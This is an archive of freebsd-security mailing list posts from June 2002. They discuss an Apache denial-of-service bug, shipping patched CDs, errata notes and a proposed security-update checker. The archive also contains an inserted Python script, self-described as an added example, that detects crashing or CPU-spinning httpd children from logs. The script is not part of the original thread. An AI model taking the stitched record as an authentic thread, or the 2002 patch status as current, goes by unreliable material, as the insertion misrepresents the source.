> Long story short, no OS can keep an inexperienced admin from opening it up to security vulnerabilities...
>
> This is just another case of bad timing. Not a lot that can be done. Shouldn't we just follow the same precedent set by prior security issues which were installable from the base system (BIND, OpenSSH, etc.)?

I'd still like to come up with something better. But right now, I have a very practical reason for asking for a "clean" CD set. What I'm looking for is a CD set that I can hand out for evangelistic purposes -- something that a new user can use to set up a trouble-free Web server. Obviously, if it has a vulnerable version of Apache (it'll probably be targeted by a worm within a week), it won't be trouble-free! Ditto if the ATAPI CD-ROM problem isn't fixed. (Matt's right; this is important.)

One thing about open source -- as Murray Stokely has pointed out -- is that it's OK to miss a ship date to get things working right. If I were a CD manufacturer, I'd strongly consider waiting until I could ship discs with the two problems mentioned above fixed.
The purpose of my query was simply to find out if one of the vendors was (a) holding off on shipping; or (b) planning to revise its CD set once the problems were fixed. (I could imagine doing a smaller run in anticipation of this.) Such a vendor would get bragging rights; it would be able to say it had a less buggy and more secure snapshot. So, I'm hoping that one will. --Brett P.S. -- Like your domain name. After Don Martin, I assume? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 5:25: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 3622537B400 for ; Tue, 18 Jun 2002 05:25:02 -0700 (PDT) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.36 #1) id 17KI2m-00024M-00; Tue, 18 Jun 2002 14:25:08 +0200 From: Sheldon Hearn To: Brett Glass Cc: kgasso@blort.org, security@FreeBSD.ORG Subject: Re: CDs with patched Apache? In-reply-to: Your message of "Tue, 18 Jun 2002 03:49:28 CST." <4.3.2.7.2.20020618033604.00d42aa0@localhost> Date: Tue, 18 Jun 2002 14:25:08 +0200 Message-ID: <7957.1024403108@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 18 Jun 2002 03:49:28 CST, Brett Glass wrote: > But if you were installing from CD, you wouldn't be warned. Unless.... > Unless pkg_add phoned home to check on the package. Which is possible > if the machine can be connected to the Net. If we can't reroll the ISO, all is not lost. The issue can be documented in the release ERRATA online for those who pull down the ISO and in a printed ERRATA note inside CD / DVD packaging for those who buy such packages. Ciao, Sheldon. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 6: 5:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id 6027837B406 for ; Tue, 18 Jun 2002 06:05:39 -0700 (PDT) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g5ID5N123976; Tue, 18 Jun 2002 08:05:24 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g5ID5NB29579; Tue, 18 Jun 2002 08:05:23 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g5ID5K629572; Tue, 18 Jun 2002 08:05:20 -0500 (CDT) Message-ID: <3D0F3010.A9F0995A@centtech.com> Date: Tue, 18 Jun 2002 08:05:20 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: Sheldon Hearn Cc: Brett Glass , kgasso@blort.org, security@freebsd.org Subject: Re: CDs with patched Apache? References: <7957.1024403108@axl.seasidesoftware.co.za> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Why not fix the bugs, and anything else that comes along in the next week or so (or however long it takes to fix the bugs and rebuild iso's), and release a 4.6.1? 
Maybe FreeBSD needs a "security update check" tool built into sysinstall, that will do something like:

If system is being installed from the net, or installing packages from the net, automatically grab the update list, and show user possible security risks - possibly asking the user if they would like to upgrade their package/system right then.

If system is not being installed or installing packages from the net, ask the user if they would like to connect to the net to do the checking.

I think most commercial admins subscribe to the security lists, and will "do the right thing", but it's the other half of the FreeBSD users that I would worry about. There is a reason that almost all OS's are using this tactic to get updates and patches installed.

If this was a separate tool, it could be used to easily show the admin what packages are at risk on the box, without the need to manually match up pkg's installed versus packages at risk. Heck, I think I'll look for a tool that does that now, and if there isn't one, I'll write one myself.

Eric

Sheldon Hearn wrote:
>
> On Tue, 18 Jun 2002 03:49:28 CST, Brett Glass wrote:
>
> > But if you were installing from CD, you wouldn't be warned. Unless....
> > Unless pkg_add phoned home to check on the package. Which is possible
> > if the machine can be connected to the Net.
>
> If we can't reroll the ISO, all is not lost. The issue can be
> documented in the release ERRATA online for those who pull down the
> ISO and in a printed ERRATA note inside CD / DVD packaging for those who
> buy such packages.
>
> Ciao,
> Sheldon.
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

--
------------------------------------------------------------------
Eric Anderson Systems Administrator Centaur Technology
Torque, it makes the world go 'round.
------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 18 6:12:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 565AC37B400 for ; Tue, 18 Jun 2002 06:12:51 -0700 (PDT) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.36 #1) id 17KInJ-0002IG-00; Tue, 18 Jun 2002 15:13:13 +0200 From: Sheldon Hearn To: Eric Anderson Cc: Brett Glass , kgasso@blort.org, security@freebsd.org Subject: Re: CDs with patched Apache? In-reply-to: Your message of "Tue, 18 Jun 2002 08:05:20 EST." <3D0F3010.A9F0995A@centtech.com> Date: Tue, 18 Jun 2002 15:13:13 +0200 Message-ID: <8819.1024405993@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 18 Jun 2002 08:05:20 EST, Eric Anderson wrote: > Why not fix the bugs, and anything else that comes along in the next > week or so (or however long it takes to fix the bugs and rebuild > iso's), and release a 4.6.1? That's a lot more work than an errata note. :-) Ciao, Sheldon. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jun 18 6:23: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id 320B037B400 for ; Tue, 18 Jun 2002 06:23:04 -0700 (PDT) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g5IDN2124518; Tue, 18 Jun 2002 08:23:02 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g5IDN2s00693; Tue, 18 Jun 2002 08:23:02 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g5IDMx600686; Tue, 18 Jun 2002 08:22:59 -0500 (CDT) Message-ID: <3D0F3433.4CA0FCA5@centtech.com> Date: Tue, 18 Jun 2002 08:22:59 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: Tig Cc: freebsd-security@freebsd.org Subject: Re: CDs with patched Apache? References: <7957.1024403108@axl.seasidesoftware.co.za> <3D0F3010.A9F0995A@centtech.com> <20020618151739.0e099fe9.tigger@onemoremonkey.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Thanks Tig. I stumbled across your tool the other day. It looks like it's more designed to do a full system upgrade, right? I'm thinking a simple tool to basically show you what needs to be updated (at risk items only - not feature updates).

Eric

Tig wrote:
>
> http://lvl.sf.net/autoupdate.php
>
> Something I've started work on...
> (i can not post to the FreeBSD list however) > > On Tue, 18 Jun 2002 08:05:20 -0500 > Eric Anderson wrote: > > > Why not fix the bugs, and anything else that comes along in the next week or so > > (or however long it takes to fix the bugs and rebuild iso's), and release a > > 4.6.1? > > > > Maybe FreeBSD needs a "security update check" tool built into sysinstall, that > > will do something like: > > > -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology Torque, it makes the world go 'round. ------------------------------------------------------------------ From owner-freebsd-security Tue Jun 18 6:25:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id 55C2137B401 for ; Tue, 18 Jun 2002 06:25:08 -0700 (PDT) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g5IDP3124567; Tue, 18 Jun 2002 08:25:03 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g5IDP3H00807; Tue, 18 Jun 2002 08:25:03 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g5IDOx600800; Tue, 18 Jun 2002 08:25:00 -0500 (CDT) Message-ID: <3D0F34AB.D4DA21B5@centtech.com> Date: Tue, 18 Jun 2002 08:24:59 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: Sheldon Hearn Cc: Brett Glass , kgasso@blort.org, security@freebsd.org Subject: Re: CDs with patched Apache? 
References: <8819.1024405993@axl.seasidesoftware.co.za> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Heh, yes, it is, but the people who read errata, are the people who subscribe to the security list, are the people who update, are the people we don't need to think about. :) They also are probably the same people that post messages in -chat like "when is 4.6 coming out?? I need it!!" - which means when they see 4.6.1, they'll snatch it up like it's free.. :) Eric Sheldon Hearn wrote: > > On Tue, 18 Jun 2002 08:05:20 EST, Eric Anderson wrote: > > > Why not fix the bugs, and anything else that comes along in the next > > week or so (or however long it takes to fix the bugs and rebuild > > iso's), and release a 4.6.1? > > That's a lot more work than an errata note. :-) > > Ciao, > Sheldon. -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology Torque, it makes the world go 'round. 
------------------------------------------------------------------ From owner-freebsd-security Tue Jun 18 8:13:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from goanga.com (goanga.com [193.231.240.30]) by hub.freebsd.org (Postfix) with ESMTP id 26FFE37B40D for ; Tue, 18 Jun 2002 08:13:10 -0700 (PDT) Received: from abc.ro (goanga.com [193.231.240.30]) by goanga.com (8.11.3/8.11.3) with ESMTP id g5IFD4B24825 for ; Tue, 18 Jun 2002 18:13:07 +0300 (EEST) (envelope-from andrei@abc.ro) Message-ID: <3D0F4DFF.4ABEE1FB@abc.ro> Date: Tue, 18 Jun 2002 18:13:03 +0300 From: ANdrei Organization: Cronon AG - tech department X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: de, ro, en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Apache issues Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org have a few questions: 1) anyone heard anything about a worm/exploit for FreeBSD primarily, and other systems, taking advantage of the new Apache bug? 2) is FreeBSD considered to be a possible target? as far as i understood, it shouldn't be vulnerable... and if, does the bug exist in Apache2 too? 3) anyone knows if the ports have the new fixed version? as far as i understood, apache didn't release a fix till now... maybe we should have at least the port "closed" till the fix is out... keep in mind that lots of people do NOT read security lists (i know plenty of them), but they upgrade packages on a regular basis... they could install the "new" apache today, and then not worry like 2 months, though they did the update just one day before the patch was released... 
Of course, if the port was already frozen, i apologise for this last comment... haven't checked it :) tks, ANdrei -- ----------------------------------[ http://www.goanga.com ]-- Never take life seriously. _ _ Nobody gets out alive anyway. o' \.=./ `o (o o) -----------------------------------------ooO--(_)--Ooo------- From owner-freebsd-security Tue Jun 18 8:35:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 4132437B423 for ; Tue, 18 Jun 2002 08:34:57 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id B93314C; Tue, 18 Jun 2002 10:34:56 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5IFYuJI009406; Tue, 18 Jun 2002 10:34:56 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5IFYpHZ009405; Tue, 18 Jun 2002 10:34:51 -0500 (CDT) Date: Tue, 18 Jun 2002 10:34:51 -0500 From: "Jacques A. Vidrine" To: ANdrei Cc: security@FreeBSD.ORG Subject: Re: Apache issues Message-ID: <20020618153451.GE8793@madman.nectar.cc> References: <3D0F4DFF.4ABEE1FB@abc.ro> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D0F4DFF.4ABEE1FB@abc.ro> User-Agent: Mutt/1.3.99i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jun 18, 2002 at 06:13:03PM +0300, ANdrei wrote: > have a few questions: > > 1) anyone heard anything about a worm/exploit for FreeBSD primarily, and > other systems, taking advantage of the new Apache bug? No. 
Most are of the opinion that the bug is not exploitable (i.e. cannot be used to execute code on the target) on platforms other than Windows --- but of course it is hard to be certain of these things. > 2) is FreeBSD considered to be a possible target? as far as i > understood, it shouldn't be vulnerable... and if, does the bug exist in > Apache2 too? FreeBSD is a possible target to denial-of-service attacks. It does exist in apache 2 also (it was discovered there first). > 3) anyone knows if the ports have the new fixed version? as far as i > understood, apache didn't release a fix till now... maybe we should have > at least the port "closed" till the fix is out... keep in mind that lots > of people do NOT read security lists (i know plenty of them), but they > upgrade packages on a regular basis... they could install the "new" > apache today, and then not worry like 2 months, though they did the > update just one day before the patch was released... > Of course, if the port was already frozen, i apologise for this last > comment... haven't checked it :) The new apache is not available yet. The port is already marked FORBIDDEN. The port maintainers have been notified to look out for the new release. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . 
nectar@kth.se From owner-freebsd-security Tue Jun 18 8:36:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id 3FDD337B407 for ; Tue, 18 Jun 2002 08:36:34 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id 27F83243C0; Tue, 18 Jun 2002 10:36:33 -0500 (CDT) Received: from schulte-laptop.nospam.schulte.org (nb-65.netbriefings.com [209.134.134.65]) by clink.schulte.org (Postfix) with ESMTP id AC236243BE; Tue, 18 Jun 2002 10:36:30 -0500 (CDT) Message-Id: <5.1.1.6.2.20020618103108.03b55ca8@pop3s.schulte.org> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 18 Jun 2002 10:34:02 -0500 To: ANdrei , security@FreeBSD.ORG From: Christopher Schulte Subject: Re: Apache issues In-Reply-To: <3D0F4DFF.4ABEE1FB@abc.ro> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 06:13 PM 6/18/2002 +0300, ANdrei wrote: >as far as i understood, apache didn't release a fix till now... I see no fix, yet. From http://httpd.apache.org/ @ Tue Jun 18 10:34:13 CDT 'The Apache Software Foundation are currently working on new releases that fix this issue; please stay tuned here at http://httpd.apache.org/ for updated versions as they become available.' http://www.apache.org/dist/httpd/ shows nothing added or modified in the month of June. Are you seeing something else? >tks, >ANdrei -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. 
From owner-freebsd-security Tue Jun 18 8:41:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from borja.sarenet.es (borja.sarenet.es [192.148.167.77]) by hub.freebsd.org (Postfix) with ESMTP id 41B9A37B407 for ; Tue, 18 Jun 2002 08:41:49 -0700 (PDT) Received: from borja.sarenet.es (localhost [127.0.0.1]) by borja.sarenet.es (8.12.3/8.12.3) with ESMTP id g5IFflFZ085338 for ; Tue, 18 Jun 2002 17:41:47 +0200 (CEST) (envelope-from borjam@sarenet.es) Content-Type: text/plain; charset="iso-8859-1" From: Borja Marcos Organization: Sarenet S.A. To: security@freebsd.org Subject: Re: Apache issues Date: Tue, 18 Jun 2002 17:41:46 +0200 X-Mailer: KMail [version 1.4] References: <3D0F4DFF.4ABEE1FB@abc.ro> In-Reply-To: <3D0F4DFF.4ABEE1FB@abc.ro> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200206181741.46606.borjam@sarenet.es> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday 18 June 2002 17:13, ANdrei wrote: > have a few questions: > > 1) anyone heard anything about a worm/exploit for FreeBSD primarily, and > other systems, taking advantage of the new Apache bug? It can be used for a denial of service. Doing some tests, I have seen httpd processes receiving a SIGBUS and a SIGSEGV. After that, they enter an endless loop getting 100% CPU. Under other systems, such as Solaris or Linux, the httpd processes crash. Borja. 
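Borja's report above describes two symptoms a defender can watch for: httpd children taking SIGBUS or SIGSEGV, and on FreeBSD a child that survives the signal and spins at 100% CPU. Apache 1.3's parent records the first kind in error_log as "child pid N exit signal <name> (<number>)"; the second never reaches error_log and is visible only in process CPU usage. The script below is an added example, not code from this thread or from the Apache project. The error_log and ps lines in it are constructed for illustration, the ps column layout (`ps -axo pid,pcpu,comm`) is an assumption, and the burst window and thresholds are arbitrary starting points. It handles any exit signal, not only the three named in the thread.

```python
"""Watch Apache 1.3 error_log and process CPU for crashing or spinning httpd
children.  Added example; the log and ps lines below are constructed."""
import re
from collections import Counter, deque
from datetime import datetime

# Apache 1.3 logs a child killed by a signal as:
#   [Tue Jun 18 09:41:52 2002] [notice] child pid 24102 exit signal Bus error (10)
# Some builds append ", possible coredump in <dir>"; the regex ignores that tail.
EXIT_SIGNAL_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[notice\] child pid (?P<pid>\d+) "
    r"exit signal (?P<name>[^(]+?) \((?P<signum>\d+)\)"
)
# Signal numbers as used on FreeBSD (and Linux x86) for the three seen in the thread.
SIGNAL_NAMES = {8: "SIGFPE", 10: "SIGBUS", 11: "SIGSEGV"}

# Constructed sample error_log; not taken from any real server.
SAMPLE_ERROR_LOG = """\
[Tue Jun 18 09:41:10 2002] [notice] Apache/1.3.24 (Unix) configured -- resuming normal operations
[Tue Jun 18 09:41:52 2002] [notice] child pid 24102 exit signal Floating point exception (8)
[Tue Jun 18 09:41:55 2002] [error] [client 192.0.2.10] File does not exist: /usr/local/www/data/favicon.ico
[Tue Jun 18 09:42:03 2002] [notice] child pid 24110 exit signal Bus error (10)
[Tue Jun 18 09:42:07 2002] [notice] child pid 24111 exit signal Segmentation fault (11)
[Tue Jun 18 09:42:09 2002] [notice] child pid 24115 exit signal Segmentation fault (11), possible coredump in /usr/local
[Tue Jun 18 10:15:30 2002] [notice] child pid 24300 exit signal Segmentation fault (11)
"""
# Constructed `ps -axo pid,pcpu,comm` output; the column layout is assumed.
SAMPLE_PS = """\
  PID %CPU COMMAND
  301  0.0 httpd
24120 99.3 httpd
24121 98.7 httpd
24122  0.1 httpd
  412 12.5 sshd
"""
PS_RE = re.compile(r"^\s*(?P<pid>\d+)\s+(?P<pcpu>\d+(?:\.\d+)?)\s+(?P<comm>\S+)")


def parse_exit_signal(line):
    """Return (timestamp, pid, signum) for a child-death line, else None."""
    m = EXIT_SIGNAL_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return ts, int(m.group("pid")), int(m.group("signum"))


def signal_summary(lines):
    """Count child deaths per signal name over the whole log."""
    counts = Counter()
    for line in lines:
        parsed = parse_exit_signal(line)
        if parsed:
            signum = parsed[2]
            counts[SIGNAL_NAMES.get(signum, "signal %d" % signum)] += 1
    return dict(counts)


def crash_bursts(lines, window_seconds=60, threshold=3):
    """Sliding-window burst detector over child-death lines.

    Returns one (timestamp, deaths_in_window, Counter of signal numbers)
    entry for every child-death line at which the preceding window_seconds
    hold at least threshold deaths; a long burst therefore yields several.
    """
    window = deque()
    alerts = []
    for line in lines:
        parsed = parse_exit_signal(line)
        if parsed is None:
            continue
        ts, _pid, signum = parsed
        window.append((ts, signum))
        while (ts - window[0][0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            alerts.append((ts, len(window), Counter(s for _, s in window)))
    return alerts


def spinning_httpd(ps_lines, cpu_threshold=90.0):
    """Pids of httpd processes at or above cpu_threshold percent CPU.

    This is the FreeBSD symptom Borja describes: the child survives the
    signal and spins, so error_log never records it; only ps shows it.
    """
    pids = []
    for line in ps_lines:
        m = PS_RE.match(line)
        if m and m.group("comm") == "httpd" and float(m.group("pcpu")) >= cpu_threshold:
            pids.append(int(m.group("pid")))
    return pids


if __name__ == "__main__":
    log_lines = SAMPLE_ERROR_LOG.splitlines()
    print("deaths by signal:", signal_summary(log_lines))
    for ts, n, sigs in crash_bursts(log_lines):
        print("burst at %s: %d child deaths in 60s, signals %s" % (ts, n, dict(sigs)))
    print("spinning httpd pids:", spinning_httpd(SAMPLE_PS.splitlines()))
```

On a real host the two functions would be fed `tail -f` of error_log and periodic `ps` output respectively; a burst of exit-signal lines or a set of httpd children pinned near 100% CPU is the cue to check that the running Apache carries the fix and to restart the spinning children.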
From owner-freebsd-security Tue Jun 18 8:43:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from borja.sarenet.es (borja.sarenet.es [192.148.167.77]) by hub.freebsd.org (Postfix) with ESMTP id 25DF337B406 for ; Tue, 18 Jun 2002 08:43:44 -0700 (PDT) Received: from borja.sarenet.es (localhost [127.0.0.1]) by borja.sarenet.es (8.12.3/8.12.3) with ESMTP id g5IFhgFZ085352 for ; Tue, 18 Jun 2002 17:43:42 +0200 (CEST) (envelope-from borjamar@sarenet.es) Content-Type: text/plain; charset="iso-8859-1" From: Borja Marcos To: security@freebsd.org Subject: Re: Apache issues Date: Tue, 18 Jun 2002 17:43:42 +0200 X-Mailer: KMail [version 1.4] References: <5.1.1.6.2.20020618103108.03b55ca8@pop3s.schulte.org> In-Reply-To: <5.1.1.6.2.20020618103108.03b55ca8@pop3s.schulte.org> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200206181743.42211.borjamar@sarenet.es> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday 18 June 2002 17:34, Christopher Schulte wrote: > Are you seeing something else? Updating http_protocol.c to the 1.318 version seems to correct the problem. Anyway, there is nothing more solid; they are finishing a new release (1.3.25). Borja. 
From owner-freebsd-security Tue Jun 18 8:46:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from borja.sarenet.es (borja.sarenet.es [192.148.167.77]) by hub.freebsd.org (Postfix) with ESMTP id EC27537B42F for ; Tue, 18 Jun 2002 08:46:24 -0700 (PDT) Received: from borja.sarenet.es (localhost [127.0.0.1]) by borja.sarenet.es (8.12.3/8.12.3) with ESMTP id g5IFkNFZ085389 for ; Tue, 18 Jun 2002 17:46:24 +0200 (CEST) (envelope-from borjamar@sarenet.es) Content-Type: text/plain; charset="iso-8859-1" From: Borja Marcos To: security@freebsd.org Subject: Re: Apache issues Date: Tue, 18 Jun 2002 17:46:23 +0200 X-Mailer: KMail [version 1.4] References: <5.1.1.6.2.20020618103108.03b55ca8@pop3s.schulte.org> <200206181743.42211.borjamar@sarenet.es> In-Reply-To: <200206181743.42211.borjamar@sarenet.es> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200206181746.23549.borjamar@sarenet.es> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday 18 June 2002 17:43, Borja Marcos wrote: > On Tuesday 18 June 2002 17:34, Christopher Schulte wrote: > > Are you seeing something else? > > Updating http_protocol.c to the 1.318 version seems to correct the > problem. Anyway, there is nothing more solid; they are finishing a new > release (1.3.25). Sorry, 1.318. http://cvs.apache.org/viewcvs.cgi/apache-1.3/src/main/http_protocol.c Borja. 
From owner-freebsd-security Tue Jun 18 8:46:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 4C81237B40F for ; Tue, 18 Jun 2002 08:46:33 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id JAA00962; Tue, 18 Jun 2002 09:45:57 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020618094300.03202e50@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 18 Jun 2002 09:45:52 -0600 To: Eric Anderson , Sheldon Hearn From: Brett Glass Subject: Re: CDs with patched Apache? Cc: kgasso@blort.org, security@freebsd.org In-Reply-To: <3D0F3010.A9F0995A@centtech.com> References: <7957.1024403108@axl.seasidesoftware.co.za> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 07:05 AM 6/18/2002, Eric Anderson wrote: >Maybe FreeBSD needs a "security update check" tool built into sysinstall, that >will do something like: > >If system is being installed from the net, or installing packages from the net, >automatically grab the update list, and show user possible security risks - >possibly asking the user if they would like to upgrade their package/system >right then. Excellent idea! >I think most commercial admins subscribe to the security lists, and will "do the >right thing", but it's the other half of the FreeBSD users that I would worry >about. And even a professional admin can sometimes miss a notice. They're not superhuman, y'know. 
>There is a reason that almost all OS's are using this tactic to get updates and >patches installed. If this was a separate tool, it could be used to easily show >the admin what packages are at risk on the box, without the need to manually >match up pkg's installed versus packages at risk. Not only OSes, but other products such as virus checkers, spyware checkers.... Even tax preparation programs. Nowadays, when one sells ANY product on CD, it's a good bet that it will be stale upon arrival. This includes FreeBSD. The installer should anticipate this, as the installers for commercial products do. --Brett From owner-freebsd-security Tue Jun 18 8:49: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id EC7C037B480; Tue, 18 Jun 2002 08:48:43 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id JAA01004; Tue, 18 Jun 2002 09:48:38 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020618094648.0321cf00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 18 Jun 2002 09:48:33 -0600 To: "Jacques A. Vidrine" , ANdrei From: Brett Glass Subject: Re: Apache issues Cc: security@FreeBSD.ORG In-Reply-To: <20020618153451.GE8793@madman.nectar.cc> References: <3D0F4DFF.4ABEE1FB@abc.ro> 